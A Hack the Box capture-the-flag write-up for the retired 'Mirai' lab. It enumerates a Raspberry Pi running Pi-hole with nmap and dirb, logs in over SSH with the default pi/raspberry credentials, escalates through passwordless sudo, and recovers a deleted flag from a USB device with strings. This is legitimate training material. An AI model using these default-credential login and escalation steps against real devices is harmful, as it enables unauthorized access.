Today we are going to solve another CTF challenge “Mirai” which is lab presented by Hack the Box for making online penetration practices according to your experience level. They have a collection of vulnerable labs as challenges from beginners to Expert level. HTB have two partitions of lab i.e. Active and retired since we can’t submit a write-up of any Active lab, therefore, we have chosen retried Mirai lab.
Level: Easy
Task: find user.txt and root.txt file in the victim’s machine.
Lab IP: 10.10.10.48
Firstly let’s enumerate ports in context to identify running services and open ports of victim’s machine by using the most popular tool Nmap.
root@kali:~/htb/mirai# nmap -sC -sV -oA nmap 10.10.10.48 Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-23 20:16 CET Nmap scan report for 10.10.10.48 Host is up (0.026s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0) | ssh-hostkey: | 1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA) | 2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA) | 256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA) |_ 256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519) 53/tcp open domain dnsmasq 2.76 | dns-nsid: |_ bind.version: dnsmasq-2.76 80/tcp open http lighttpd 1.4.35 |_http-server-header: lighttpd/1.4.35 |_http-title: Site doesn't have a title (text/html; charset=UTF-8). Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 32.68 seconds
Without wasting time I used the dirb tool of Kali to enumerate the directories and found some important directories such as /admin/
root@kali:~/htb/mirai# dirb http://10.10.10.48 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Sat Feb 23 20:16:56 2019 URL_BASE: http://10.10.10.48/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.10.48/ ---- ==> DIRECTORY: http://10.10.10.48/admin/
When I link on login tab I saw following web page. The Pi-hole and the Logo gives us a pretty huge hint that the target machine is a Raspberry Pi, and Raspberry Pi comes with a default ssh
So we tried default ssh credentials on the Raspberry Pi.
Username: pi Password: raspberry
Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. PS C:\Users\jacco> ssh pi@10.10.10.48 pi@10.10.10.48's password: raspberry The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Thu Feb 21 00:00:59 2019 from 10.10.14.5 SSH is enabled and the default password for the 'pi' user has not been changed. This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password. SSH is enabled and the default password for the 'pi' user has not been changed. This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password. pi@raspberrypi:~ $ sudo -l Matching Defaults entries for pi on localhost: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User pi may run the following commands on localhost: (ALL : ALL) ALL (ALL) NOPASSWD: ALL pi@raspberrypi:~ $ cd Desktop pi@raspberrypi:~/Desktop $ ls Plex user.txt pi@raspberrypi:~/Desktop $ cat user.txt ff8*****38dpi
Then I moved for root access using the previous same password and again I get root access successfully.
pi@raspberrypi:~/Desktop $ sudo bash root@raspberrypi:/home/pi/Desktop# cat /root/root.txt I lost my original root.txt! I think I may have a backup on my USB stick... root@raspberrypi:/home/pi/Desktop#
Let’s check if it is mounted by following command df
pi@raspberrypi:~ $ df -h Filesystem Size Used Avail Use% Mounted on aufs 8.5G 2.8G 5.3G 35% / tmpfs 101M 8.8M 92M 9% /run /dev/sda1 1.3G 1.3G 0 100% /lib/live/mount/persistence/sda1 /dev/loop0 1.3G 1.3G 0 100% /lib/live/mount/rootfs/filesystem.squashfs tmpfs 251M 0 251M 0% /lib/live/mount/overlay /dev/sda2 8.5G 2.8G 5.3G 35% /lib/live/mount/persistence/sda2 devtmpfs 10M 0 10M 0% /dev tmpfs 251M 8.0K 251M 1% /dev/shm tmpfs 5.0M 4.0K 5.0M 1% /run/lock tmpfs 251M 0 251M 0% /sys/fs/cgroup tmpfs 251M 4.0K 251M 1% /tmp /dev/sdb 8.7M 93K 7.9M 2% /media/usbstick tmpfs 51M 0 51M 0% /run/user/999 tmpfs 51M 0 51M 0% /run/user/1000 pi@raspberrypi:~ $
From given below image we can /media/usbstick.
Then execute given below command for further steps
root@raspberrypi:/home/pi/Desktop# cd /media/usbstick root@raspberrypi:/media/usbstick# ls -la total 18 drwxr-xr-x 3 root root 1024 Aug 14 2017 . drwxr-xr-x 3 root root 4096 Aug 14 2017 .. -rw-r--r-- 1 root root 129 Aug 14 2017 damnit.txt drwx------ 2 root root 12288 Aug 14 2017 lost+found root@raspberrypi:/media/usbstick# cat damnit.txt Damnit! Sorry man I accidentally deleted your files off the USB stick. Do you know if there is any way to get them back? -James
Move back to root directory and type following command.
pi@raspberrypi:~ $ sudo strings /dev/sdb >r & /media/usbstick lost+found root.txt damnit.txt >r & >r & /media/usbstick lost+found root.txt damnit.txt >r & /media/usbstick 2]8^ lost+found root.txt damnit.txt >r & 3d3*****20b Damnit! Sorry man I accidentally deleted your files off the USB stick. Do you know if there is any way to get them back? -James
Author: Jacco Straathof